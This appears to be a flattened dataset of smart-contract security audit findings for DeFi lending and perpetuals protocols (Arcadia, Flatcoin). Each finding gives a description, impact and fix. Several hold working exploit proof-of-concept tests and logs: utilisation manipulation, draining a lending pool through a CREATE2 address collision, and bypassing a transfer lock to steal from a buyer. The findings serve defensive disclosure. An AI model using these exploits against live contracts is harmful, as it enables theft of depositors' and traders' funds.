any subsequent call to either mint(), increaseLiquidity(), burn(), decreaseLiquidity(), claimRewards() or rewardOf(), which all internally call _getRewardBalances(), will either revert for underflow or account for less rewards than it should because `assetState_.lastRewardGlobal` has not been correctly reset to `0` but `currentRewardGlobal` (which is fetched from stargate) has:\\n```\\nuint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);\\nuint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌\\n```\\n\\n```\\nfunction _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {\\n currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));\\n}\\n```\\n\\nPOC\\nTo copy-paste in USDbCPool.fork.t.sol:\\n```\\nfunction testFork_WrongRewards() public {\\n uint256 initBalance = 1000 * 10 ** USDbC.decimals();\\n // Given : A user deposits in the Stargate USDbC pool, in exchange of an LP token.\\n vm.startPrank(users.accountOwner);\\n deal(address(USDbC), users.accountOwner, initBalance);\\n\\n USDbC.approve(address(router), initBalance);\\n router.addLiquidity(poolId, initBalance, users.accountOwner);\\n // assert(ERC20(address(pool)).balanceOf(users.accountOwner) > 0);\\n\\n // And : The user stakes the LP token via the StargateAssetModule\\n uint256 stakedAmount = ERC20(address(pool)).balanceOf(users.accountOwner);\\n ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmount);\\n uint256 tokenId = stakedStargateAM.mint(address(pool), uint128(stakedAmount) / 4);\\n\\n //We let 10 days pass to accumulate rewards.\\n vm.warp(block.timestamp + 10 days);\\n\\n // User increases liquidity of the position.\\n uint256 initialRewards = stakedStargateAM.rewardOf(tokenId);\\n stakedStargateAM.increaseLiquidity(tokenId, 1);\\n\\n vm.expectRevert();\\n stakedStargateAM.burn(tokenId); //❌ User can't call burn because of underflow\\n\\n //We let 10 days pass, this accumulates 
enough rewards for the call to burn to succeed\\n vm.warp(block.timestamp + 10 days);\\n uint256 currentRewards = stakedStargateAM.rewardOf(tokenId);\\n stakedStargateAM.burn(tokenId);\\n\\n assert(currentRewards - initialRewards < 1e10); //❌ User gets less rewards than he should. The rewards of the 10 days the user couldn't withdraw his position are basically zeroed out.\\n vm.stopPrank();\\n}\\n```\\nчAdjust the `assetState[asset].lastRewardGlobal` correctly or since every action (mint(), `burn()`, `increaseLiquidity()`, `decreaseliquidity()`, claimReward()) will have the effect of withdrawing all the current rewards it's possible to change the function _getRewardBalances() to use the amount returned by _getCurrentReward() as the `deltaReward` directly:\\n```\\nuint256 deltaReward = _getCurrentReward(positionState_.asset);\\n```\\nчUsers will not be able to take any action on their positions until `currentRewardGlobal` is greater or equal to `assetState_.lastRewardGlobal`. After that they will be able to perform actions but their position will account for less rewards than it should because a total amount of `assetState_.lastRewardGlobal` rewards is nullified.\\nThis will also DOS the whole lending/borrowing system if an Arcadia Stargate position is used as collateral because rewardOf(), which is called to estimate the collateral value, also reverts.ч```\\nuint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);\\nuint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌\\n```\\n -`CREATE2` address collision against an Account will allow complete draining of lending poolsчmediumчThe factory function `createAccount()` creates a new account contract for the user using `CREATE2`. We show that a meet-in-the-middle attack at finding an address collision against an undeployed account is possible. 
Furthermore, such an attack allows draining of all funds from the lending pool.\\nThe attack consists of two parts: Finding a collision, and actually draining the lending pool. We describe both here:\\nPoC: Finding a collision\\nNote that in `createAccount`, `CREATE2` salt is user-supplied, and `tx.origin` is technically also user-supplied:\\n```\\naccount = address(\\n new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(\\n versionInformation[accountVersion].implementation\\n )\\n);\\n```\\n\\nThe address collision an attacker will need to find are:\\nOne undeployed Arcadia account address (1).\\nArbitrary attacker-controlled wallet contract (2).\\nBoth sets of addresses can be brute-force searched because:\\nAs shown above, `salt` is a user-supplied parameter. By brute-forcing many `salt` values, we have obtained many different (undeployed) wallet accounts for (1).\\n(2) can be searched the same way. The contract just has to be deployed using `CREATE2`, and the `salt` is in the attacker's control by definition.\\nAn attacker can find any single address collision between (1) and (2) with high probability of success using the following meet-in-the-middle technique, a classic brute-force-based attack in cryptography:\\nBrute-force a sufficient number of values of salt ($2^{80}$), pre-compute the resulting account addresses, and efficiently store them e.g. in a Bloom filter data structure.\\nBrute-force contract pre-computation to find a collision with any address within the stored set in step 1.\\nThe feasibility, as well as detailed technique and hardware requirements of finding a collision, are sufficiently described in multiple references:\\n1: A past issue on Sherlock describing this attack.\\n2: EIP-3607, which rationale is this exact attack. 
The EIP is in final state.\\n3: A blog post discussing the cost (money and time) of this exact attack.\\nThe hashrate of the BTC network has reached $6 \\times 10^{20}$ hashes per second as of time of writing, taking only just $33$ minutes to achieve $2^{80}$ hashes. A fraction of this computing power will still easily find a collision in a reasonably short timeline.\\nPoC: Draining the lending pool\\nEven given EIP-3607 which disables an EOA if a contract is already deployed on top, we show that it's still possible to drain the lending pool entirely given a contract collision.\\nAssuming the attacker has already found an address collision against an undeployed account, let's say `0xCOLLIDED`. The steps for complete draining of a lending pool are as follow:\\nFirst tx:\\nDeploy the attack contract onto address `0xCOLLIDED`.\\nSet infinite allowance for {0xCOLLIDED ---> attacker wallet} for any token they want.\\nDestroy the contract using `selfdestruct`.\\nPost Dencun hardfork, `selfdestruct` is still possible if the contract was created in the same transaction. The only catch is that all 3 of these steps must be done in one tx.\\nThe attacker now has complete control of any funds sent to `0xCOLLIDED`.\\nSecond tx:\\nDeploy an account to `0xCOLLIDED`.\\nDeposit an asset, collateralize it, then drain the collateral using the allowance set in tx1.\\nRepeat step 2 for as long as they need to (i.e. collateralize the same asset multiple times).\\nThe account at `0xCOLLIDED` is now infinitely collateralized.\\nFunds for step 2 and 3 can be obtained through external flash loan. Simply return the funds when this step is finished.\\nAn infinitely collateralized account has infinite borrow power. 
Simply borrow all the funds from the lending pool and run away with it, leaving an infinity collateral account that actually holds no funds.\\nThe attacker has stolen all funds from the lending pool.\\nCoded unit-PoC\\nWhile we cannot provide an actual hash collision due to infrastructural constraints, we are able to provide a coded PoC to prove the following two properties of the EVM that would enable this attack:\\nA contract can be deployed on top of an address that already had a contract before.\\nBy deploying a contract and self-destruct in the same tx, we are able to set allowance for an address that has no bytecode.\\nHere is the PoC, as well as detailed steps to recreate it:\\nThe provided PoC has been tested on Remix IDE, on the Remix VM - Mainnet fork environment, as well as testing locally on the Holesky testnet fork, which as of time of writing, has been upgraded with the Dencun hardfork.чThe mitigation method is to prevent controlling over the deployed account address (or at least severely limit that). Some techniques may be:\\nDo not allow a user-supplied `salt`, as well as do not use the user address as a determining factor for the `salt`.\\nUse the vanilla contract creation with `CREATE`, as opposed to `CREATE2`. The contract's address is determined by `msg.sender` (the factory), and the internal `nonce` of the factory (for a contract, this is just \"how many other contracts it has deployed\" plus one).\\nThis will prevent brute-forcing of one side of the collision, disabling the $O(2^{81})$ search technique.чComplete draining of a lending pool if an address collision is found.\\nWith the advancement of computing hardware, the cost of an attack has been shown to be just a few million dollars, and that the current Bitcoin network hashrate allows about $2^{80}$ in about half an hour. 
The cost of the attack may be offset with longer brute force time.\\nFor a DeFi lending pool, it is normal for a pool TVL to reach tens or hundreds of millions in USD value (top protocols' TVL are well above the billions). It is then easy to show that such an attack is massively profitable.ч```\\naccount = address(\\n new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(\\n versionInformation[accountVersion].implementation\\n )\\n);\\n```\\n -Utilisation Can Be Manipulated Far Above 100%чmediumчThe utilisation of the protocol can be manipulated far above 100% via token donation. It is easiest to set this up on an empty pool. This can be used to manipulate the interest to above 10000% per minute to steal from future depositors.\\nThe utilisation is basically assets_borrowed / assets_loaned. A higher utilisation creates a higher interest rate. This is assumed to be less than 100%. However if it exceeds 100%, there is no cap here:\\nNormally, assets borrowed should never exceed assets loaned, however this is possible in Arcadia as the only thing stopping a borrow exceeding loans is that the `transfer` of tokens will revert due to not enough tokens in the `Lending pool`. However, an attacker can make it not revert by simply sending tokens directly into the lending pool. For example using the following sequence:\\ndeposit 100 assets into tranche\\nUse ERC20 Transfer to transfer `1e18` assets into the `LendingPool`\\nBorrow the `1e18` assets\\nThese are the first steps of the coded POC at the bottom of this issue. It uses a token donation to make a borrow which is far larger than the loan amount.\\nIn the utilisation calculation, this results in an incredibly high utilisation rate and thus interest rate as it is not capped at 100%. This is why some protocols implement a hardcap of utilisation at 100%.\\nThe interest rate is so high that over 2 minutes, 100 assets grows to over 100000 assets, or a 100000% interest over 2 minutes. 
The linked similar exploit on Silo Finance has an even more drastic interest manipulation which could drain the whole protocol in a block. However I did not optimise the numbers for this POC.\\nNote that the 1e18 assets \"donated\" to the protocol are not lost. They can simply be all borrowed into an attackers account.\\nThe attacker can set this up when the initial lending pool is empty. Then, they can steal assets from subsequent depositors due to the huge amount of interest collected from their small initial deposit\\nLet me sum up the attack in the POC:\\ndeposit 100 assets into tranche\\nUse ERC20 Transfer to transfer `1e18` assets into the `LendingPool`\\nBorrow the `1e18` assets\\nVictim deposits into tranche\\nAttacker withdraws the victims funds which is greater than the 100 assets the attacker initially deposited\\nHere is the output from the console.logs:\\n```\\nRunning 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test\\n[PASS] testScenario_Poc() (gas: 799155)\\nLogs:\\n 100 initial pool balance. This is also the amount deposited into tranche\\n warp 2 minutes into future\\n mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack\\n 22 shares were burned in exchange for 100000 assets. 
Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\\n```\\n\\nThis is the edited version of `setUp()` in `_scenario.t.sol`\\n```\\nfunction setUp() public virtual override(Fuzz_Lending_Test) {\\n Fuzz_Lending_Test.setUp();\\n deployArcadiaLendingWithAccounts();\\n\\n vm.prank(users.creatorAddress);\\n pool.addTranche(address(tranche), 50);\\n\\n // Deposit funds in the pool.\\n deal(address(mockERC20.stable1), users.liquidityProvider, type(uint128).max, true);\\n\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.stable1.approve(address(pool), 100);\\n //only 1 asset was minted to the liquidity provider\\n tranche.mint(100, users.liquidityProvider);\\n vm.stopPrank();\\n\\n vm.startPrank(users.creatorAddress);\\n pool.setAccountVersion(1, true);\\n pool.setInterestParameters(\\n Constants.interestRate, Constants.interestRate, Constants.interestRate, Constants.utilisationThreshold\\n );\\n vm.stopPrank();\\n\\n vm.prank(users.accountOwner);\\n proxyAccount.openMarginAccount(address(pool));\\n }\\n```\\n\\nThis test was added to `BorrowAndRepay.scenario.t.sol`\\n```\\n function testScenario_Poc() public {\\n\\n uint poolBalance = mockERC20.stable1.balanceOf(address(pool));\\n console.log(poolBalance, \"initial pool balance. 
This is also the amount deposited into tranche\");\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.stable1.approve(address(pool), 1e18);\\n mockERC20.stable1.transfer(address(pool),1e18);\\n vm.stopPrank();\\n\\n // Given: collateralValue is smaller than maxExposure.\\n //amount token up to max\\n uint112 amountToken = 1e30;\\n uint128 amountCredit = 1e10;\\n\\n //get the collateral factor\\n uint16 collFactor_ = Constants.tokenToStableCollFactor;\\n uint256 valueOfOneToken = (Constants.WAD * rates.token1ToUsd) / 10 ** Constants.tokenOracleDecimals;\\n\\n //deposits token1 into proxyAccount\\n depositTokenInAccount(proxyAccount, mockERC20.token1, amountToken);\\n\\n uint256 maxCredit = (\\n //amount credit is capped based on amount Token\\n (valueOfOneToken * amountToken) / 10 ** Constants.tokenDecimals * collFactor_ / AssetValuationLib.ONE_4\\n / 10 ** (18 - Constants.stableDecimals)\\n );\\n\\n\\n vm.startPrank(users.accountOwner);\\n //borrow the amountCredit to the proxy account\\n pool.borrow(amountCredit, address(proxyAccount), users.accountOwner, emptyBytes3);\\n vm.stopPrank();\\n\\n assertEq(mockERC20.stable1.balanceOf(users.accountOwner), amountCredit);\\n\\n //warp 2 minutes into the future.\\n vm.roll(block.number + 10);\\n vm.warp(block.timestamp + 120);\\n\\n console.log(\"warp 2 minutes into future\");\\n\\n address victim = address(123);\\n deal(address(mockERC20.stable1), victim, type(uint128).max, true);\\n\\n vm.startPrank(victim);\\n mockERC20.stable1.approve(address(pool), type(uint128).max);\\n uint shares = tranche.mint(1e3, victim);\\n vm.stopPrank();\\n\\n console.log(\"mint was used rather than deposit to ensure no rounding error. 
This a UTILISATION manipulation attack not a share inflation attack\");\\n\\n //function withdraw(uint256 assets, address receiver, address owner_)\\n\\n //WITHDRAWN 1e5\\n vm.startPrank(users.liquidityProvider);\\n uint withdrawShares = tranche.withdraw(1e5, users.liquidityProvider,users.liquidityProvider);\\n vm.stopPrank();\\n\\n console.log(withdrawShares, \"shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\");\\n\\n\\n }\\n```\\nчAdd a utilisation cap of 100%. Many other lending protocols implement this mitigation.чAn early depositor can steal funds from future depositors through utilisation/interest rate manipulation.ч```\\nRunning 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test\\n[PASS] testScenario_Poc() (gas: 799155)\\nLogs:\\n 100 initial pool balance. This is also the amount deposited into tranche\\n warp 2 minutes into future\\n mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack\\n 22 shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\\n```\\n -`LendingPool#flashAction` is broken when trying to refinance position across `LendingPools` due to improper access controlчmediumчWhen refinancing an account, `LendingPool#flashAction` is used to facilitate the transfer. However due to access restrictions on `updateActionTimestampByCreditor`, the call made from the new creditor will revert, blocking any account transfers. 
This completely breaks refinancing across lenders which is a core functionality of the protocol.\\nLendingPool.sol#L564-L579\\n```\\nIAccount(account).updateActionTimestampByCreditor();\\n\\nasset.safeTransfer(actionTarget, amountBorrowed);\\n\\n{\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n}\\n```\\n\\nWe see above that `account#updateActionTimestampByCreditor` is called before `flashActionByCreditor`.\\nAccountV1.sol#L671\\n```\\nfunction updateActionTimestampByCreditor() external onlyCreditor updateActionTimestamp { }\\n```\\n\\nWhen we look at this function, it can only be called by the current creditor. When refinancing a position, this function is actually called by the pending creditor since the `flashaction` should originate from there. This will cause the call to revert, making it impossible to refinance across `lendingPools`.ч`Account#updateActionTimestampByCreditor()` should be callable by BOTH the current and pending creditorчRefinancing is impossibleч```\\nIAccount(account).updateActionTimestampByCreditor();\\n\\nasset.safeTransfer(actionTarget, amountBorrowed);\\n\\n{\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n}\\n```\\n -Malicious keepers can manipulate the price when executing an orderчhighчMalicious keepers can manipulate the price when executing an order by selecting a price in favor of either the LPs or long traders, leading to a loss of assets to the victim's party.\\nWhen the keeper executes an order, it was understood from the protocol team that the protocol expects that the keeper must also update the Pyth price to the latest one available off-chain. 
In addition, the contest page mentioned that \"an offchain price that is pulled by the keeper and pushed onchain at time of any order execution\".\\nThis requirement must be enforced to ensure that the latest price is always used.\\n```\\nFile: DelayedOrder.sol\\n function executeOrder(\\n address account,\\n bytes[] calldata priceUpdateData\\n )\\n external\\n payable\\n nonReentrant\\n whenNotPaused\\n updatePythPrice(vault, msg.sender, priceUpdateData)\\n orderInvariantChecks(vault)\\n {\\n // Settle funding fees before executing any order.\\n // This is to avoid error related to max caps or max skew reached when the market has been skewed to one side for a long time.\\n // This is more important in case the we allow for limit orders in the future.\\n vault.settleFundingFees();\\n..SNIP..\\n }\\n```\\n\\nHowever, this requirement can be bypassed by malicious keepers. A keeper could skip or avoid the updating of the Pyth price by passing in an empty `priceUpdateData` array, which will pass the empty array to the `OracleModule.updatePythPrice` function.\\n```\\nFile: OracleModifiers.sol\\n /// @dev Important to use this modifier in functions which require the Pyth network price to be updated.\\n /// Otherwise, the invariant checks or any other logic which depends on the Pyth network price may not be correct.\\n modifier updatePythPrice(\\n IFlatcoinVault vault,\\n address sender,\\n bytes[] calldata priceUpdateData\\n ) {\\n IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).updatePythPrice{value: msg.value}(\\n sender,\\n priceUpdateData\\n );\\n _;\\n }\\n```\\n\\nWhen the Pyth's `Pyth.updatePriceFeeds` function is executed, the `updateData` parameter will be set to an empty array.\\n```\\nFile: OracleModule.sol\\n function updatePythPrice(address sender, bytes[] calldata priceUpdateData) external payable nonReentrant {\\n // Get fee amount to pay to Pyth\\n uint256 fee = offchainOracle.oracleContract.getUpdateFee(priceUpdateData);\\n\\n 
// Update the price data (and pay the fee)\\n offchainOracle.oracleContract.updatePriceFeeds{value: fee}(priceUpdateData);\\n\\n if (msg.value - fee > 0) {\\n // Need to refund caller. Try to return unused value, or revert if failed\\n (bool success, ) = sender.call{value: msg.value - fee}(\"\");\\n if (success == false) revert FlatcoinErrors.RefundFailed();\\n }\\n }\\n```\\n\\nInspecting the source code of Pyth's on-chain contract, the `Pyth.updatePriceFeeds` function will not perform any update since the `updateData.length` will be zero in this instance.\\n```\\nfunction updatePriceFeeds(\\n bytes[] calldata updateData\\n) public payable override {\\n uint totalNumUpdates = 0;\\n for (uint i = 0; i < updateData.length; ) {\\n if (\\n updateData[i].length > 4 &&\\n UnsafeCalldataBytesLib.toUint32(updateData[i], 0) ==\\n ACCUMULATOR_MAGIC\\n ) {\\n totalNumUpdates += updatePriceInfosFromAccumulatorUpdate(\\n updateData[i]\\n );\\n } else {\\n updatePriceBatchFromVm(updateData[i]);\\n totalNumUpdates += 1;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n uint requiredFee = getTotalFee(totalNumUpdates);\\n if (msg.value < requiredFee) revert PythErrors.InsufficientFee();\\n}\\n```\\n\\nThe keeper is permissionless, thus anyone can be a keeper and execute order on the protocol. If this requirement is not enforced, keepers who might also be LPs (or collude with LPs) can choose whether to update the Pyth price to the latest price or not, depending on whether the updated price is in favor of the LPs. For instance, if the existing on-chain price ($1000 per ETH) is higher than the latest off-chain price ($950 per ETH), malicious keepers will use the higher price of $1000 to open the trader's long position so that its position's entry price will be set to a higher price of $1000. When the latest price of $950 gets updated, the longer position will immediately incur a loss of $50. 
Since this is a zero-sum game, long traders' loss is LPs' gain.\\nNote that per the current design, when the open long position order is executed at $T2$, any price data with a timestamp between $T1$ and $T2$ is considered valid and can be used within the `executeOpen` function to execute an open order. Thus, when the malicious keeper uses an up-to-date price stored in Pyth's on-chain contract, it will not revert as long as its timestamp is on or after $T1$.\\n\\nAlternatively, it is also possible for the opposite scenario to happen where the keepers favor the long traders and choose to use a lower older price on-chain to execute the order instead of using the latest higher price. As such, the long trader's position will be immediately profitable after the price update. In this case, the LPs are on the losing end.\\nSidenote: The oracle's `maxDiffPercent` check will not guard against this attack effectively. For instance, in the above example, if the Chainlink price is $975 and the `maxDiffPercent` is 5%, the Pyth price of $950 or $1000 still falls within the acceptable range. If the `maxDiffPercent` is reduced to a smaller margin, it will potentially lead to a more serious issue where all the transactions get reverted when fetching the price, breaking the entire protocol.чEnsure that the keepers must update the Pyth price when executing an order. 
Perform additional checks against the `priceUpdateData` submitted by the keepers to ensure that it is not empty and `priceId` within the `PriceInfo` matches the price ID of the collateral (rETH), so as to prevent malicious keeper from bypassing the price update by passing in an empty array or price update data that is not mapped to the collateral (rETH).чLoss of assets as shown in the scenario above.ч```\\nFile: DelayedOrder.sol\\n function executeOrder(\\n address account,\\n bytes[] calldata priceUpdateData\\n )\\n external\\n payable\\n nonReentrant\\n whenNotPaused\\n updatePythPrice(vault, msg.sender, priceUpdateData)\\n orderInvariantChecks(vault)\\n {\\n // Settle funding fees before executing any order.\\n // This is to avoid error related to max caps or max skew reached when the market has been skewed to one side for a long time.\\n // This is more important in case the we allow for limit orders in the future.\\n vault.settleFundingFees();\\n..SNIP..\\n }\\n```\\n -Losses of some long traders can eat into the margins of othersчmediumчThe losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits, leading to a loss of assets for the long traders.\\nAt $T0$, the current price of ETH is $1000 and assume the following state:\\nAlice's Long Position 1 Bob's Long Position 2 Charles (LP)\\nPosition Size = 6 ETH\\nMargin = 3 ETH\\nLast Price (entry price) = $1000 Position Size = 6 ETH\\nMargin = 5 ETH\\nLast Price (entry price) = $1000 Deposited 12 ETH\\nThe `stableCollateralTotal` will be 12 ETH\\nThe `GlobalPositions.marginDepositedTotal` will be 8 ETH (3 + 5)\\nThe `globalPosition.sizeOpenedTotal` will be 12 ETH (6 + 6)\\nThe total balance of ETH in the vault is 20 ETH.\\nAs this is a perfectly hedged market, the accrued fee will be zero, and ignored in this report for simplicity's sake.\\nAt $T1$, the price of the ETH drops from $1000 to $600. 
At this point, the settle margin of both long positions will be as follows:\\nAlice's Long Position 1 Bob's Long Position 2\\npriceShift = Current Price - Last Price = $600 - $1000 = -$400\\nPnL = (Position Size * priceShift) / Current Price = (6 ETH * -$400) / $600 = -4 ETH\\nsettleMargin = marginDeposited + PnL = 3 ETH + (-4 ETH) = -1 ETH PnL = -4 ETH (Same calculation)\\nsettleMargin = marginDeposited + PnL = 5 ETH + (-4 ETH) = 1 ETH\\nAlice's long position is underwater (settleMargin < 0), so it can be liquidated. When the liquidation is triggered, it will internally call the `updateGlobalPositionData` function. Even if the liquidation does not occur, any of the following actions will also trigger the `updateGlobalPositionData` function internally:\\nexecuteOpen\\nexecuteAdjust\\nexecuteClose\\nThe purpose of the `updateGlobalPositionData` function is to update the global position data. This includes getting the total profit loss of all long traders (Alice & Bob), and updating the margin deposited total + stable collateral total accordingly.\\nAssume that the `updateGlobalPositionData` function is triggered by one of the above-mentioned functions. Line 179 below will compute the total PnL of all the opened long positions.\\n```\\npriceShift = current price - last price\\npriceShift = $600 - $1000 = -$400\\n\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / current price\\nprofitLossTotal = (12 ETH * -$400) / $600\\nprofitLossTotal = -8 ETH\\n```\\n\\nThe `profitLossTotal` is -8 ETH. 
This is aligned with what we have calculated earlier, where Alice's PnL is -4 ETH and Bob's PnL is -4 ETH (total = -8 ETH loss).\\nAt Line 184 below, the `newMarginDepositedTotal` will be set to as follows (ignoring the `_marginDelta` for simplicity's sake)\\n```\\nnewMarginDepositedTotal = _globalPositions.marginDepositedTotal + _marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 8 ETH + 0 + (-8 ETH) = 0 ETH\\n```\\n\\nWhat happened above is that 8 ETH collateral is deducted from the long traders and transferred to LP. When `newMarginDepositedTotal` is zero, this means that the long trader no longer owns any collateral. This is incorrect, as Bob's position should still contribute 1 ETH remaining margin to the long trader's pool.\\nLet's review Alice's Long Position 1: Her position's settled margin is -1 ETH. When the settled margin is -ve then the LPs have to bear the cost of loss per the comment here. However, in this case, we can see that it is Bob (long trader) instead of LPs who are bearing the cost of Alice's loss, which is incorrect.\\nLet's review Bob's Long Position 2: His position's settled margin is 1 ETH. If his position's liquidation margin is $LM$, Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin. 
However, in this case, the `marginDepositedTotal` is already zero, so there is no more collateral left on the long trader pool for Bob to withdraw, which is incorrect.\\nWith the current implementation, the losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits.\\n```\\nFile: FlatcoinVault.sol\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n\\n // Profit loss of leverage traders has to be accounted for by adjusting the stable collateral total.\\n 
// Note that technically, even the funding fees should be accounted for when computing the stable collateral total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here\\n _updateStableCollateralTotal(-profitLossTotal);\\n }\\n```\\nчThe following are the two issues identified earlier and the recommended fixes:\\nIssue 1\\nLet's review Alice's Long Position 1: Her position's settled margin is -1 ETH. When the settled margin is -ve then the LPs have to bear the cost of loss per the comment here. However, in this case, we can see that it is Bob (long trader) instead of LPs who are bearing the cost of Alice's loss, which is incorrect.\\nFix: Alice -1 ETH loss should be borne by the LP, not the long traders. The stable collateral total of LP should be deducted by 1 ETH to bear the cost of the loss.\\nIssue 2\\nLet's review Bob's Long Position 2: His position's settled margin is 1 ETH. If his position's liquidation margin is $LM$, Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin. However, in this case, the `marginDepositedTotal` is already zero, so there is no more collateral left on the long trader pool for Bob to withdraw, which is incorrect.\\nFix: Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin regardless of the PnL of other long traders. 
Bob's margin should be isolated from Alice's loss.чLoss of assets for the long traders as the losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits.ч```\\npriceShift = current price - last price\\npriceShift = $600 - $1000 = -$400\\n\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / current price\\nprofitLossTotal = (12 ETH * -$400) / $600\\nprofitLossTotal = -8 ETH\\n```\\n -The transfer lock for leveraged position orders can be bypassedчhighчThe leveraged positions can be closed either through `DelayedOrder` or through the `LimitOrder`. Once the order is announced via `DelayedOrder.announceLeverageClose` or `LimitOrder.announceLimitOrder` function the LeverageModule's `lock` function is called to prevent given token to be transferred. This mechanism can be bypassed and it is possible to unlock the token transfer while having order announced.\\nExploitation scenario:\\nAttacker announces leverage close order for his position via `announceLeverageClose` of `DelayedOrder` contract.\\nAttacker announces limit order via `announceLimitOrder` of `LimitOrder` contract.\\nAttacker cancels limit order via `cancelLimitOrder` of `LimitOrder` contract.\\nThe position is getting unlocked while the leverage close announcement is active.\\nAttacker sells the leveraged position to a third party.\\nAttacker executes the leverage close via `executeOrder` of `DelayedOrder` contract and gets the underlying collateral stealing the funds from the third party that the leveraged position was sold to.\\nFollowing proof of concept presents the attack:\\n```\\nfunction testExploitTransferOut() public {\\n uint256 collateralPrice = 1000e8;\\n\\n vm.startPrank(alice);\\n\\n uint256 balance = WETH.balanceOf(alice);\\n console2.log(\"alice balance\", balance);\\n \\n (uint256 minFillPrice, ) = oracleModProxy.getPrice();\\n\\n // Announce order through delayed orders to lock 
tokenId\\n delayedOrderProxy.announceLeverageClose(\\n tokenId,\\n minFillPrice - 100, // add some slippage\\n mockKeeperFee.getKeeperFee()\\n );\\n \\n // Announce limit order to lock tokenId\\n limitOrderProxy.announceLimitOrder({\\n tokenId: tokenId,\\n priceLowerThreshold: 900e18,\\n priceUpperThreshold: 1100e18\\n });\\n \\n // Cancel limit order to unlock tokenId\\n limitOrderProxy.cancelLimitOrder(tokenId);\\n \\n balance = WETH.balanceOf(alice);\\n console2.log(\"alice after creating two orders\", balance);\\n\\n // TokenId is unlocked and can be transferred while the delayed order is active\\n leverageModProxy.transferFrom(alice, address(0x1), tokenId);\\n console2.log(\"new owner of position NFT\", leverageModProxy.ownerOf(tokenId));\\n\\n balance = WETH.balanceOf(alice);\\n console2.log(\"alice after transfering position NFT out e.g. selling\", balance);\\n\\n skip(uint256(vaultProxy.minExecutabilityAge())); // must reach minimum executability time\\n\\n uint256 oraclePrice = collateralPrice;\\n\\n bytes[] memory priceUpdateData = getPriceUpdateData(oraclePrice);\\n delayedOrderProxy.executeOrder{value: 1}(alice, priceUpdateData);\\n\\n uint256 finalBalance = WETH.balanceOf(alice);\\n console2.log(\"alice after executing delayerd order and cashing out profit\", finalBalance);\\n console2.log(\"profit\", finalBalance - balance);\\n}\\n```\\n\\nOutput\\n```\\nRunning 1 test for test/unit/Common/LimitOrder.t.sol:LimitOrderTest\\n[PASS] testExploitTransferOut() (gas: 743262)\\nLogs:\\n alice balance 99879997000000000000000\\n alice after creating two orders 99879997000000000000000\\n new owner of position NFT 0x0000000000000000000000000000000000000001\\n alice after transfering position NFT out e.g. selling 99879997000000000000000\\n alice after executing delayerd order and cashing out profit 99889997000000000000000\\n profit 10000000000000000000\\n\\nTest result: ok. 
